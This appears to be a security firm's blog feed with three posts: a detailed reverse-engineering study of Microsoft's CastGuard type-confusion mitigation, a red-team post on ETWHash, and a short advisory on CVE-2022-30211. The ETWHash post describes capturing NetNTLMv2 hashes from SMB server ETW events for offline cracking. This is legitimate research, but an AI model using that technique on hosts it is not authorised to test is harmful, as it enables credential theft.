
Preventing Type Confusion with CastGuard

18 October 2023 at 08:00

Built into the Microsoft C++ compiler and runtime, CastGuard is a pivotal security enhancement designed to significantly reduce the number of exploitable Type Confusion vulnerabilities in applications. Joe Bialek gave a talk about CastGuard at BHUSA2022 (slides) that explains the overall goals of the feature, how it was developed, and how it works at a high level. This article offers a journey into my discovery of CastGuard – delving into a technical evaluation of its mechanics, exploring illustrative examples, and highlighting relevant compiler flags.

While looking into new control flow guard feature support in the Windows PE load config directory a while back, I stumbled across a newly added field called CastGuardOsDeterminedFailureMode, added in Windows 21H2. I had never heard of CastGuard before so, naturally, I wondered what it did.

To give a brief overview, CastGuard is intended to solve Type Confusion problems such as the following:

#include <iostream>

struct Organism {
    virtual void Speak() { std::cout << "..."; }
};

struct Animal : public Organism {
    virtual void Speak() { std::cout << "Uh... hi?"; }
};

struct Dog : public Animal {
    virtual void Speak() { std::cout << "Woof!"; }
};

struct Cat : public Animal {
    virtual void Speak() { std::cout << "Meow!"; }
};

void SayMeow(Animal* animal) {
    static_cast<Cat*>(animal)->Speak();
}

int main() {
    Animal* dog = new Dog();
    SayMeow(dog);
}

In this application, SayMeow will print “Woof!”, in a classic example of type confusion through an illegal downcast. The compiler is unable to infer that the Dog type being passed to SayMeow is a problem, because the function takes an Animal type, so no contract is broken there. The cast within SayMeow is also valid from the compiler’s perspective, because a Cat is an Animal, so it is entirely valid to downcast if you, the developer who wrote the code, know that the object being passed is in fact a Cat or a descendent type thereof. This is why this bug class is so pernicious – it’s easy to violate the type contract, especially in complex codebases.

Ordinarily this can be solved with dynamic_cast and RTTI, which tags each object with type information, but this has its own problems (see the talk linked above for full details) and it’s non-trivial to replace static_cast with dynamic_cast across a large codebase, especially in the case where your code has to coexist with 3rd party / user code (e.g. in the case of runtime libraries) where you can’t even enforce that RTTI is enabled. Furthermore, RTTI causes significant codegen bloat and performance penalties – a static cast is free (you’re interpreting the memory natively as if it were the type being cast to) whereas a dynamic cast with RTTI requires a handful of stores, loads, jumps, and calls on every cast.
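For comparison, here is a minimal sketch of the RTTI-based approach – dynamic_cast consults the object’s runtime type information and yields nullptr for an invalid pointer downcast, at the cost of the overhead described above:

void SayMeowSafely(Animal* animal) {
    // dynamic_cast checks the object's RTTI at runtime and returns nullptr
    // if 'animal' does not actually point to a Cat (or something derived from Cat).
    if (Cat* cat = dynamic_cast<Cat*>(animal)) {
        cat->Speak();
    } else {
        std::cout << "Not a cat!";
    }
}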

CastGuard acts as an additional layer of protection against type confusion, or, more specifically, against cases where type confusion is the first-order memory vulnerability; it is not designed to protect against cases where an additional memory corruption issue is leveraged first. Its goal is to offer this protection with minimal codegen bloat and performance overhead, without modifying the (near-universally relied upon) ABI for C++ objects.

CastGuard leverages the fact that vftables (aka vtables) uniquely identify types. As long as the types on the left- and right-hand side of the cast have at least one vftable, and both types were declared within the binary being compiled, the object types can be consistently and uniquely determined by their vftable address (with one caveat: COMDAT folding for identical vftables must be disabled in the linker). This allows the vftable pointer to be used as a unique type identifier on each object, avoiding the need for RTTI bloat and expensive runtime checks. Since an object’s vftable pointer is almost certainly being accessed around the same time as any cast involving that object, the memory being accessed is probably already in cache (or is otherwise about to benefit from being cached) so the performance impact of accessing that data is negligible.
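To make that concrete, here is a minimal sketch of what “identifying a type by its vftable pointer” means in practice. It relies on the MSVC ABI detail that the vfptr is the first pointer-sized field of a polymorphic object, not on anything guaranteed by standard C++:

void IdentifyByVftable() {
    Animal* a = new Dog();
    // MSVC ABI assumption: the first pointer-sized field of a polymorphic object
    // is its vftable pointer.
    void** vfptr = *reinterpret_cast<void***>(a);
    // 'vfptr' now points at Dog::$vftable@, uniquely identifying the object's dynamic
    // type within this binary (given that identical vftables are not COMDAT-folded).
    std::cout << "vftable at " << vfptr << "\n";
}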

Initially, Microsoft explored the idea of creating bitmaps that describe which types’ vftables are compatible with each other, so that each type that was observed to be down-cast to had a bitvector that described which of the other vftables were valid for casting. However, this turns out to be inefficient in a bunch of ways, and they came up with a much more elegant solution.

The type vftables are enumerated during link time code generation (LTCG). A type inheritance hierarchy is produced, and that hierarchy is flattened into a top-down depth-first list of vftables. These are stored contiguously in memory.

To use the above code as an example, if we assume that each vftable is 8 bytes in size, the CastGuard section would end up looking like this:

Offset Name
0x00 __CastGuardVftableStart
0x08 Organism::$vftable@
0x10 Animal::$vftable@
0x18 Dog::$vftable@
0x20 Cat::$vftable@
0x28 __CastGuardVftableEnd

Notice that parent types are always before child types in the table. Siblings can be in any order, but a sibling’s descendants would come immediately after it. For example, if we added a WolfHound class that inherited from Dog, its vftable would appear between Dog::$vftable@ and Cat::$vftable@ in the above table.

At any given static_cast<T> site the compiler knows how many other types inherit from T. Given that child types appear sequentially after the parent type in the CastGuard section, the compiler knows that there are a certain number of child type vftables appearing immediately afterward.

For example, Animal has two child types – Cat and Dog – and both of these types are allowed to be cast to Animal. So, if you do static_cast<Animal*>(foo), CastGuard checks to see if foo’s vftable pointer lands within two vftable slots downward of Animal::$vftable@, which in this case would be any offset between 0x10 and 0x20 inclusive, i.e. the vftables of Animal, Dog, and Cat. These are all valid. If you try to cast an Organism object to the Animal type, CastGuard’s check detects this as being invalid because the Organism object’s vftable pointer points to offset 0x08, which is outside the valid range.

Looking back again at the example code, the cast being done is static_cast<Cat*> on a Dog object. The Cat type has no descendants, so the range size of valid vftables is zero. The Cat type’s vftable, Cat::$vftable@, is at offset 0x20, whereas the Dog object’s vftable pointer points to offset 0x18, so it therefore fails the CastGuard range check. Casting a Cat object to the Cat type works, on the other hand, because a Cat object’s vftable pointer points to offset 0x20, which is within a zero-byte range of Cat::$vftable@.

This check is optimised even further by computing the valid range size at compile time, instead of storing the count of descendent types and multiplying that by the CastGuard vftable alignment size on every check. At each static cast site, the compiler simply subtracts the left-hand side type’s vftable address from the right-hand side object’s vftable pointer, and checks to see if it is less than or equal to the valid range. This not only reduces the computational complexity of each check, but it also means that the alignment of vftables within the CastGuard section can be arbitrarily decided by the linker on a per-build basis, based on the maximum vftable size being stored, without needing to include any additional metadata or codegen. In fact, the vftables don’t even need to be padded to all have the same alignment, as long as the compiler computes the valid range based on the sum of the vftable sizes of the child types.
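As a rough approximation, the check emitted at a cast site behaves like the following sketch. The two parameters stand in for constants that the compiler and linker bake into the check at build time; they are not real symbols:

#include <cstdint>

// For a cast to Animal*, 'targetVftableAddr' would be the address of Animal::$vftable@
// and 'validRangeSize' the combined size of the Dog and Cat vftables.
bool CastIsValid(Organism* obj, uintptr_t targetVftableAddr, uintptr_t validRangeSize) {
    uintptr_t objVfptr = *reinterpret_cast<uintptr_t*>(obj);   // read the object's vfptr
    // Unsigned subtraction: any vftable located before the target's wraps around to a
    // huge value, so a single comparison covers both the lower and upper bounds.
    return (objVfptr - targetVftableAddr) <= validRangeSize;
}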

I mentioned earlier that CastGuard only protects casts for types within the same binary. The CastGuard range check described above will always fail if a type from another binary is cast to a type from the current binary, because the vftable pointers will be out of range. This is obviously unacceptable – it’d break almost every program that uses types from a DLL – so CastGuard includes an extra compatibility check. This is where the __CastGuardVftableStart and __CastGuardVftableEnd symbols come in. If the vftable for an object being cast lands outside of the CastGuard section range, the check fails open and allows the cast because it is outside the scope of protection offered by the CastGuard feature.

This approach is much faster than dynamic casting with RTTI and adds very little extra bloat in the compiled binary (caveat: see the talk for details on where they had to optimise this a bit further for things like CRTP). As such, CastGuard is suitable to be enabled everywhere, including in performance-critical paths where dynamic casting would be far too expensive.

Pretty cool, right? I thought so too.

Let’s now go back to the original reason for me discovering CastGuard in the first place: the CastGuardOsDeterminedFailureMode field that was added to the PE load config structure in 21H2. It’s pretty clear that this field has something to do with CastGuard (the name rather gives it away) but it isn’t clear what the field actually does.

My first approach to figure this out was to enumerate every single PE file on my computer (and a Windows 11 Pro VM), parse it, and look for nonzero values in the CastGuardOsDeterminedFailureMode field. I found a bunch! This field is documented as containing a virtual address (VA). I wrote some code to parse out the CastGuardOsDeterminedFailureMode field from the load config, attempt to resolve the VA to an offset, then read the data at that offset.
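Something along these lines works – a simplified sketch rather than the actual scanner, assuming a recent SDK in which IMAGE_LOAD_CONFIG_DIRECTORY64 declares the CastGuardOsDeterminedFailureMode field, with error handling omitted:

#include <windows.h>
#include <cstdio>

// Sketch: map a 64-bit PE as an image and read CastGuardOsDeterminedFailureMode
// from its load config directory.
void DumpCastGuardField(const wchar_t* path) {
    HMODULE mod = LoadLibraryExW(path, nullptr, DONT_RESOLVE_DLL_REFERENCES);
    if (!mod) return;
    auto base = reinterpret_cast<BYTE*>(mod);
    auto dos = reinterpret_cast<PIMAGE_DOS_HEADER>(base);
    auto nt = reinterpret_cast<PIMAGE_NT_HEADERS64>(base + dos->e_lfanew);
    auto& dir = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG];
    if (dir.VirtualAddress != 0 && dir.Size != 0) {
        auto cfg = reinterpret_cast<PIMAGE_LOAD_CONFIG_DIRECTORY64>(base + dir.VirtualAddress);
        // Only trust the field if this binary's load config is large enough to contain it.
        if (cfg->Size >= FIELD_OFFSET(IMAGE_LOAD_CONFIG_DIRECTORY64, CastGuardOsDeterminedFailureMode) + sizeof(ULONGLONG)) {
            ULONGLONG va = cfg->CastGuardOsDeterminedFailureMode;
            // The field holds a VA relative to the preferred image base, so convert it to an RVA.
            ULONGLONG rva = va ? va - nt->OptionalHeader.ImageBase : 0;
            printf("CastGuardOsDeterminedFailureMode: VA 0x%llx (RVA 0x%llx)\n", va, rva);
        }
    }
    FreeLibrary(mod);
}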

I found three overall classes of PE file through this scan method:

  • PE files where the CastGuardOsDeterminedFailureMode field is zero.
  • PE files where the CastGuardOsDeterminedFailureMode field contains a valid VA which points to eight zero bytes in the .rdata section.
  • PE files where the CastGuardOsDeterminedFailureMode field contains what looks like a valid VA, but is in fact an invalid VA.

The third type of result is a bit confusing. The VA looks valid at first glance – it starts with the same few nibbles as other valid VAs – but it doesn’t point within any of the sections. At first I thought my VA translation code was broken, but I confirmed that the VAs were indeed invalid when translated by other tools such as CFF Explorer and PE-Bear. We’ll come back to this later.

I loaded a few of the binaries with valid VAs into Ghidra and applied debugging symbols. I found that these binaries contained a symbol named __castguard_check_failure_os_handled_fptr in the .rdata section, and that the CastGuardOsDeterminedFailureMode VA pointed to the address of this symbol. I additionally found that the binaries included a fast-fail code called FAST_FAIL_CAST_GUARD (65) which is used when the process fast-fails due to a CastGuard range check failure. However, I couldn’t find the __CastGuardVftableStart or __CastGuardVftableEnd symbols for the CastGuard vftable region that had been mentioned in Joe’s talk.

Searching for these symbol names online led me to pieces of vcruntime source code included in SDKs as part of Visual Studio. The relevant source file is guard_support.c and it can be found in the following path:

[VisualStudio]/VC/Tools/MSVC/[version]/crt/src/vcruntime/guard_support.c

It appears that the CastGuard feature was added somewhere around version 14.28.29333, and minor changes have been made in later versions.

Comments in this file explain how the table alignment works. As of 14.34.31933, the start of the CastGuard section is aligned to a size of 16*sizeof(void*), i.e. 128-byte aligned on 64-bit platforms and 64-byte aligned on 32-bit platforms.

There are three parts to the table, and they are allocated as .rdata subsections: .rdata$CastGuardVftablesA, .rdata$CastGuardVftablesB, and .rdata$CastGuardVftablesC.

Parts A and C store the __CastGuardVftablesStart and __CastGuardVftablesEnd symbols. Both of these are defined as a CastGuardVftables struct type that contains a padding field of the alignment size. This means that the first vftable in the CastGuard section is placed at __CastGuardVftablesStart + sizeof(struct CastGuardVftables).

Part B is generated automatically by the compiler. It contains the vftables, and these are automatically aligned to whatever size makes sense during compilation. If no vftables are generated, part B is essentially missing, and you end up with __CastGuardVftablesEnd placed 64/128 bytes after __CastGuardVftablesStart.
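Putting that description into code, the declarations in guard_support.c look roughly like this – a paraphrased reconstruction based on the behaviour described above, not the verbatim source:

#pragma section(".rdata$CastGuardVftablesA", read)
#pragma section(".rdata$CastGuardVftablesC", read)

// One alignment-sized blob of padding: 128 bytes on 64-bit, 64 bytes on 32-bit.
struct CastGuardVftables {
    char padding[16 * sizeof(void*)];
};

__declspec(allocate(".rdata$CastGuardVftablesA"))
const struct CastGuardVftables __CastGuardVftablesStart = { 0 };

__declspec(allocate(".rdata$CastGuardVftablesC"))
const struct CastGuardVftables __CastGuardVftablesEnd = { 0 };

// The compiler-generated vftables land in .rdata$CastGuardVftablesB, which the linker
// places alphabetically between the A and C subsections when merging .rdata.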

The guard_support.c code does not contain the CastGuard checks themselves; these are emitted as part of the compiler itself rather than being represented in a public source file. However, guard_support.c does contain the failure routines and the AppCompat check routine.

When a CastGuard check at a static_cast site fails, it calls into one of four failure routines:

  1. __castguard_check_failure_nop – does nothing.
  2. __castguard_check_failure_debugbreak – raises a breakpoint by calling __debugbreak().
  3. __castguard_check_failure_fastfail – fast-fails using __fastfail(FAST_FAIL_CAST_GUARD).
  4. __castguard_check_failure_os_handled – calls an OS handler function.

Rather than calling the AppCompat check routine at every static_cast site, the check is instead deferred until a CastGuard check fails. Each of the check failure routines above, with the exception of nop, first calls into the AppCompat check routine to see if the failure should be ignored.

The AppCompat check routine is implemented in __castguard_compat_check, and it looks like this:

static
inline
BOOL
__cdecl __castguard_compat_check(PVOID rhsVftablePtr)
{
    ULONG_PTR realVftableRangeStart = (ULONG_PTR)&__CastGuardVftablesStart + sizeof(struct CastGuardVftables);
    ULONG_PTR realVftableRangeEnd = (ULONG_PTR)&__CastGuardVftablesEnd;
    ULONG_PTR vftableRangeSize = realVftableRangeEnd - realVftableRangeStart;

    return (ULONG_PTR)rhsVftablePtr - realVftableRangeStart <= vftableRangeSize;
}

This routine is responsible for checking whether the right-hand side (object being cast) vftable pointer is pointing somewhere between the first vftable in the CastGuard section and __CastGuardVftablesEnd. If it is, the AppCompat check returns true (i.e. this is a valid case that CastGuard should protect against), otherwise it returns false.

In the case of __castguard_check_failure_os_handled, the handler code looks like this:

extern
inline
void __cdecl __castguard_check_failure_os_handled(PVOID rhsVftablePtr)
{
    if (__castguard_compat_check(rhsVftablePtr))
    {
        __castguard_check_failure_os_handled_wrapper(rhsVftablePtr);
    }

    return;
}

If the AppCompat routine says that the failed check should be honoured, it calls an OS handler wrapper. The wrapper function looks like this:

static inline void
__declspec(guard(nocf))
__cdecl __castguard_check_failure_os_handled_wrapper(PVOID rhsVftablePtr)
{
    // This function is opted out of CFG because the OS handled function pointer
    // is allocated within ".00cfg" section. This section benefits from the same
    // level of protection as a CFG pointer would.

    if (__castguard_check_failure_os_handled_fptr != NULL)
    {
        __castguard_check_failure_os_handled_fptr(rhsVftablePtr);
    }
    return;
}

The __castguard_check_failure_os_handled_fptr function pointer being referred to here is the symbol that CastGuardOsDeterminedFailureMode points to in the load config table – the exact one I was trying to figure out the purpose of!

That function pointer is defined as:

__declspec(allocate(".00cfg"))
DECLSPEC_SELECTANY
VOID (* volatile __castguard_check_failure_os_handled_fptr)(PVOID rhsVftablePtr) = NULL;

The declspec is important here – it places __castguard_check_failure_os_handled_fptr in the same section as CFG/XFG pointers, which means (as the code comment above points out) that the OS handler function pointer is protected in the same way as the CFG/XFG pointers. Control flow from the CastGuard check site to the check failure function to the AppCompat check function can be protected by control flow guard, but flow from the failure routine to the OS handled function pointer cannot because its value is (presumably always) unknown at compile time. This is why the wrapper function above is required, with guard(nocf) applied – it disables CFG for the flow from the check failure function to the OS handler function, since CFG would likely disallow the indirect call, but since the pointer itself is protected it doesn’t actually matter.

This indicates that CastGuardOsDeterminedFailureMode is intended to be used to specify the location of the __castguard_check_failure_os_handled_fptr symbol, which in turn points to an OS handler function that is called when a check failure occurs.

None of this is documented but, given that Joe’s BHUSA2022 talk included an anecdote about Microsoft starting the CastGuard feature off in a report-only mode, I can only presume that CastGuardOsDeterminedFailureMode was designed to provide the binaries with this reporting feature.

At this point we still have a few open questions, though. First, how does the compiler pick between the four different failure handlers? Second, how are the CastGuard checks themselves implemented? And third, why do a lot of the binaries have invalid VAs in CastGuardOsDeterminedFailureMode?

To answer the first question, we have to take a look at c2.dll in the MSVC compiler, which is where CastGuard is implemented under the hood. This DLL contains a class called CastGuard which, unsurprisingly, is responsible for most of the heavy lifting. One of the functions in this class, called InsertCastGuardCompatCheck, refers to a field of some unknown object in thread-local storage and picks which of the four check functions to insert a call to based on that value:

Value Call
1 __castguard_check_failure_fastfail
2 __castguard_check_failure_debugbreak
3 __castguard_check_failure_os_handled
4 __castguard_check_failure_nop

From prior reverse engineering expeditions into the MSVC compiler, I remembered that config flags passed to the compiler are typically stored in a big structure in TLS. From there I was able to find the hidden compiler flags that enable CastGuard and control its behaviour.

Hidden flags can be passed to each stage of the compiler using a special /d command line argument. The format of the argument is /dN… where N specifies which DLL the hidden flag should be passed to (1 for the front-end compiler, c1.dll, or 2 for the code generator, c2.dll). The flag is then appended to the argument.

The known hidden compiler flags for CastGuard are:

Flag Description
/d2CastGuard- Disables CastGuard.
/d2CastGuard Enables CastGuard.
/d2CastGuardFailureMode:fastfail Sets the failure mode to fast-fail.
/d2CastGuardFailureMode:nop Sets the failure mode to nop.
/d2CastGuardFailureMode:os_handled Sets the failure mode to OS handled.
/d2CastGuardFailureMode:debugbreak Sets the failure mode to debug break.
/d2CastGuardOption:dump_layout_info Dumps the CastGuard layout info in the build output.
/d2CastGuardOption:force_type_system Forces type system analysis, even if the binary is too big for fast analysis.
This is intended to be used with the linker, rather than the compiler, so warning C5066 is raised if you pass it.
/d2CastGuardTestFlags:# Sets various test flags for the CastGuard implementation, as a bitwise numeric value. Hex numbers are valid.

So now we know how the different failure modes are set: at build time, with a compiler flag.

If we rebuild the example code with some extra compiler flags, we can try CastGuard out:

/d2CastGuard /d2CastGuardFailureMode:debugbreak /d2CastGuardOption:dump_layout_info

The compiler then prints layout information for CastGuard:

1>***** CastGuard Region ******
1>Offset:0x00000 RTTIBias:0x8 Size:0x010 Alignment:0x08 VftableName:??_7Dog@@6B@
1>
1>
1>***** CastGuard Compatibility Info ******
1>

When executed, the static cast in SayMeow has a CastGuard check applied and raises a debug break in __castguard_check_failure_debugbreak.

We can also learn a little more about CastGuard from the warnings and errors that are known to be associated with it, by looking at the string tables in the compiler binaries:

  • C5064: “CastGuard has been disabled because the binary is too big for fast type system analysis and compiler throughput will be degraded. To override this behavior and force enable the type system so CastGuard can be used, specify the flag /d2:-CastGuardOption:force_type_system to the linker.”
  • C5065: “The CastGuard subsystem could not be enabled.”
  • C5066: “CastGuardOption:force_type_system should not be passed to the compiler, it should only be passed to the linker via /d2:-CastGuardOption:force_type_system. Passing this flag to the compiler directly will force the type system for all binaries this ltcg module is linked in to.”
  • C5067: “CastGuard is not compatible with d2notypeopt”
  • C5068: “CastGuard is not compatible with incremental linking”
  • C5069: “CastGuard cannot initialize the type system. An object is being used that was built with a compiler that did not include the necessary vftable type information (I_VFTABLETIS) which prevents the type system from loading. Object: %s”
  • C5070: “CastGuard cannot initialize the type system. An object is being used that was built with a compiler that did not include the necessary type information (I_TIS) which prevents the type system from loading. Object: %s”
  • C5071: “CastGuard cannot initialize the type system. An error occurred while trying to read the type information from the debug il. Object: %s”

Digging even further into the implementation, it appears that Microsoft added a new C++ attribute called nocastguard, which can be used to exclude a type from CastGuard checks. Based on my experimentation, this attribute is applied to types (applying the attribute to an argument or variable causes a compiler crash!) and disables checks when a static cast is performed to that type.

Changing our example code to the following causes the CastGuard check to be eliminated, and the type confusion bug returns:

struct [[msvc::nocastguard]] Cat : Animal {
    virtual void Speak() { std::cout << "Meow!\n"; }
};

If nocastguard is applied to the Dog or Animal type instead, the CastGuard check returns and the type confusion bug is prevented. This indicates that, at least in this unreleased implementation, the attribute is specifically used to prevent CastGuard checks on casts to the target type.

With a CastGuard-enabled development environment set up, it is easy to experiment, disassemble the binary, and see what the generated code looks like. In the simplest version of our example program, the result is actually quite amusing: the program does nothing except initialise a Dog object and immediately, unconditionally call the failure routine in main. This is because the CastGuard check is injected into the IL during the optimisation phase. You can see this in practice: turning off optimisations causes the CastGuard pass to be skipped entirely. Since the check is part of the IL, it is subject to optimisation passes. The optimiser sees that the check essentially boils down to if (Cat::$vftable@ != Dog::$vftable@) { fail; }, whose condition is always true, which results in the branch being taken and the entire rest of the code being eliminated. Since SayMeow is only called once, it gets inlined, and the entire program ends up as a call to the CastGuard failure routine. This implies that it could technically be possible for a future release to identify such a scenario at build time and raise an error or warning.
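For reference, the optimised program boils down to something like this – an illustrative reconstruction, not the verbatim decompiler output:

// Illustrative only: with SayMeow inlined and the always-true check folded,
// nothing survives except the allocation and the unconditional failure call.
int main() {
    Dog* dog = new Dog();                              // kept for its side effects
    __castguard_check_failure_debugbreak(/* Dog's vftable */);
    // The Speak() call and everything after it has been eliminated as unreachable.
}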

To study things a little better, let’s expand the program in a way that introduces uncertainty and tricks the compiler into not optimising the routines. (Note: we can’t turn off optimisations to avoid all the inlining and elimination because that also turns off CastGuard.)

int main()
{
    for (int i = 0; i < 20; i++)
    {
        int idx = rand() % 3;
        Animal* animal = nullptr;
        switch (idx)
        {
        case 0:
            std::cout << "Making an animal...\n";
            animal = new Animal();
            break;
        case 1:
            std::cout << "Making a dog...\n";
            animal = new Dog();
            break;
        default:
            std::cout << "Making a cat...\n";
            animal = new Cat();
            break;
        }
        SayMeow(animal);
    }
}

This results in a program with an entirely normal looking main function, with no references to CastGuard routines. SayMeow looks like the following:

void SayMeow(Animal *animal)
{
    if (animal != nullptr && *animal != Cat::$vftable@)
    {
        __castguard_check_failure_debugbreak((void*)*animal);
    }
    animal->Speak();
}

This is pretty much expected: *animal dereferences the passed pointer to get to the vftable for the object, and, since the Cat type has no descendent types, the range check just turns into a straight equality check.

To make things more interesting, let’s add a WolfHound type that inherits from Dog, and a function called SayWoof that works just like SayMeow but with a cast to Dog instead of Cat. We’ll also update main so that it can create an Animal, Cat, Dog, or WolfHound.
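The additions look something like this (the bark string is arbitrary; the inheritance relationship and the cast are what matter):

struct WolfHound : public Dog {
    virtual void Speak() { std::cout << "Awoo!\n"; }
};

void SayWoof(Animal* animal) {
    static_cast<Dog*>(animal)->Speak();
}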

Upon building this new program, the compiler dumps the CastGuard layout:

***** CastGuard Region ******
Offset:0x00000 RTTIBias:0x8 Size:0x010 Alignment:0x08 VftableName:??_7Animal@@6B@
Offset:0x00010 RTTIBias:0x8 Size:0x010 Alignment:0x08 VftableName:??_7Dog@@6B@
Offset:0x00020 RTTIBias:0x8 Size:0x010 Alignment:0x08 VftableName:??_7WolfHound@@6B@
Offset:0x00030 RTTIBias:0x8 Size:0x010 Alignment:0x08 VftableName:??_7Cat@@6B@

***** CastGuard Compatibility Info ******
Vftable:??_7Dog@@6B@ RangeCheck ComparisonBaseVftable:??_7Dog@@6B@ Size:0x10 ObjectCreated
    CompatibleVftable: Offset:0x00010 RTTIBias:0x8 Vftable:??_7Dog@@6B@
    CompatibleVftable: Offset:0x00020 RTTIBias:0x8 Vftable:??_7WolfHound@@6B@

We can see that the WolfHound vftable is placed immediately after the Dog vftable, and that the Dog type is compatible with the Dog and WolfHound types. We can also see that the size of the range check is 0x10, which makes sense because WolfHound‘s vftable comes 0x10 bytes after Dog‘s vftable.

The CastGuard check in SayWoof now ends up looking something like this:

void SayWoof(Animal* animal)
{
    if (animal != nullptr)
    {
        if (*animal - Dog::$vftable@ > 0x10)
        {
            __castguard_check_failure_debugbreak((void*)*animal);
        }
    }
    animal->Speak();
}

Let’s enumerate the possible flows here:

  • If the type being passed is Dog, then *animal is equal to Dog::$vftable@, which makes *animal - Dog::$vftable@ equal zero, so the check passes.
  • If the type being passed is WolfHound, then *animal is equal to WolfHound::$vftable@, which is positioned 0x10 bytes after Dog::$vftable@. As such, *animal - Dog::$vftable@ will equal 0x10, and the check passes.
  • If the type being passed is Cat, then *animal is equal to Cat::$vftable@, which makes *animal - Dog::$vftable@ equal 0x20, and the check fails.
  • If the type being passed is Animal, then *animal is equal to Animal::$vftable@. Since Animal::$vftable@ is positioned before Dog::$vftable@ in the table, the result of the unsigned subtraction will wrap, causing the result to be greater than 0x10, and the check fails.

This shows CastGuard in action quite nicely!

For completeness, let’s go back and wrap up a small loose end relating to the hidden compiler flags: test flags. The /d2CastGuardTestFlags option takes a hexadecimal number value representing a set of bitwise flags. The test flags value is written to a symbol called CastGuardTestFlags inside c2.dll, and this value is used in roughly ten different locations in the code as of version 14.34.31933.

In the process of reverse engineering this code, I discovered that four separate check approaches are implemented – RangeCheck (0x01, the default), ROLCheck (0x02), ConstantBitmapCheck (0x03), and BitmapCheck (0x04) – presumably following the sequence of approaches and optimisations that were mentioned in the talk.

Here’s what I was able to figure out about these flags:

Flag Value Notes
0x01 Switches the check type to ROLCheck (0x02), as long as neither 0x02 nor 0x40 are also set.
0x02 Switches the check type to ConstantBitmapCheck (0x03), as long as 0x40 is not also set.
0x04 Appears to enable an alternative strategy for selecting the most appropriate vftable for a type with multiple inheritance.
0x08 Forces CastGuard::IsCastGuardCheckNeeded to default to true instead of false when no condition explicitly prevents a check, which appears to force the generation of CastGuard checks even if a codegen pass was not performed.
0x10 Forces generation of metadata for all types in the inheritance tree. Types that are never part of a cast check, either as a cast target or valid source type, do not normally end up as part of the CastGuard section. For example, Organism is ignored by CastGuard in our example programs because it never ends up being relevant at a static cast site. When this flag is enabled, all types in the inheritance tree are treated as relevant, and their vftables are placed into the CastGuard section. A type which is never part of a static cast, and whose parent and child types (if there are any) are never part of a static cast, is still kept separate and doesn’t end up in the CastGuard section.
0x20 Exact behaviour is unclear, but it seems to force the CastGuard subsystem to be enabled in a situation where error C5065 would be otherwise raised, and forces the TypeSystem::Builder::ProcessILRecord function to continue working even if an internal boolean named OneModuleEnablesCastGuard is false.
0x40 Switches the check type to BitmapCheck (0x04) and, if /d2CastGuardOption:dump_layout_info is also set, prints the bitmap in the build output.

The three alternative check patterns function exactly as was explained in the BHUSA2022 talk, so I won’t go into them any further.

Unless I missed anything, we appear to be down to just one final question: why am I seeing invalid VAs in CastGuardOsDeterminedFailureMode on a bunch of Windows executables?

At first I thought that there might be some kind of masking going on, with certain bits guaranteed to be zero in the VA due to alignment requirements, with those bit positions being reused to set or indicate the failure mode or check type. This doesn’t make much sense, though, and I can find no supporting evidence. It appears that this is a bug from an earlier implementation of CastGuard, when Microsoft were trialling rolling out notify-only protection on certain components. I couldn’t concretely confirm this theory, but I did manage to have a quick chat with someone who worked on the feature, and they were as surprised to see the invalid VAs as I was.

It takes time to get these compiler-level bug class mitigations implemented correctly. The analysis in this article was originally performed in February 2023, but CastGuard remains unofficial and undocumented as of October 2023. Given the unfathomable quantity of existing code that interacts with COM interfaces, all of which might be affected by this feature, and the politically fractious intersection between C++ language standards and implementation-specific language features, it isn’t particularly surprising that it’s taking Microsoft a while to roll this mitigation out.


ETWHash – “He who listens, shall receive”

3 May 2023 at 10:58

ETWHash is a small C# tool used during Red Team engagements that can consume ETW SMB events and extract NetNTLMv2 hashes for offline cracking, unlike currently documented methods.

GitHub: https://github.com/nettitude/ETWHash

Microsoft ETW (Event Tracing for Windows) is a logging mechanism integrated into the Windows operating system that enables the generation of diagnostic and tracing messages by applications. These messages can be captured and analysed by security professionals or system administrators for various purposes, including debugging and performance analysis. Although ETW is mainly used for defensive applications, offensive security research has taken great interest in bypassing the visibility it offers. However, as demonstrated in this short article, ETW can also be a great resource for offense, with some providers proving useful for passive situational awareness.

Instrumenting Your Code with ETW | Microsoft Learn

Numerous resources are available on ETW, detailing its applications in both offensive and defensive contexts. One particularly insightful resource is “Tampering with Windows Event Tracing: Background, Offense, and Defense“. The article provides a comprehensive guide to ETW, which gives all the necessary information to get up to speed.

While researching potential offensive uses for ETW, a presentation by CyberPoint at Ruxcon 2016 revealed a unique approach to utilizing ETW for information leakage and keylogging. The released POC code can be found here. The presentation sparked further interest in exploring ETW’s potential applications during Red Team engagements, leading to the discovery of a few interesting ETW providers.

Tools such as WEPExplorer and PerfView are useful in exploring ETW providers.

By utilizing WEPExplorer, all available ETW providers on the test system were listed, and the Microsoft-Windows-SMBServer provider {D48CE617-33A2-4BC3-A5C7-11AA4F29619E} quickly drew attention.


The provider exposes a large number of fields related to SMB operations of the host. An easy way to identify all the available fields of an ETW provider is by viewing the manifest of the ETW provider, which describes all the events that are supported. The manifest can be extracted using Microsoft’s Perfview:

PerfView userCommand DumpRegisteredManifest Microsoft-Windows-SMBServer


After a few hours inspecting the fields and generating SMB events to understand the logging, the field PACKETBYTES was observed to be updated every time an SMB authentication attempt occurred. The immediate next step was to dump the entire byte array to see what it contained.


As can be seen, the array contained the null-terminated ASCII “NTLMSSP” string (0x4e544c4d53535000), which is part of the NTLM authentication message headers. If you want to read up more on the NTLM authentication protocol, “The NTLM Authentication Protocol and Security Support Provider” is an excellent resource.

It immediately became evident that the provider was logging all SMB packets, including the full NetNTLMv2 challenge response. Shortly thereafter, a proof-of-concept (POC) was developed that would create a new Trace Session to consume the events of the Microsoft-Windows-SMBServer provider and, upon the occurrence of event 40000, extract the NetNTLMv2 challenge response hash from the packet bytes.


Microsoft was contacted via MSRC and confirmed that this is intended behaviour, as it requires administrative privileges on the host.

We believe that ETW is a great mechanism that is already leveraged extensively for defensive purposes, but it still has untapped potential for offensive usage. Interesting ideas for further exploitation might be:

  • Using ETW as an interprocess transfer channel
  • Using ETW to monitor / identify deceptive technologies
  • Using ETW to have situational awareness of services / processes / network connections / reboots

Maybe we should start listening more to ETW instead of disabling it 😉


CVE-2022-30211: Windows L2TP VPN Memory Leak and Use after Free Vulnerability

17 August 2022 at 09:00

Nettitude discovered a Memory Leak turned Use after Free (UaF) bug in the Microsoft implementation of the L2TP VPN protocol. The vulnerability affects most server and desktop versions of Windows, dating back to Windows Server 2008 and Windows 7 respectively. This could result in a Denial of Service (DoS) condition or could potentially be exploited to achieve Remote Code Execution (RCE).

Please see the official Microsoft advisory for full details:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30211

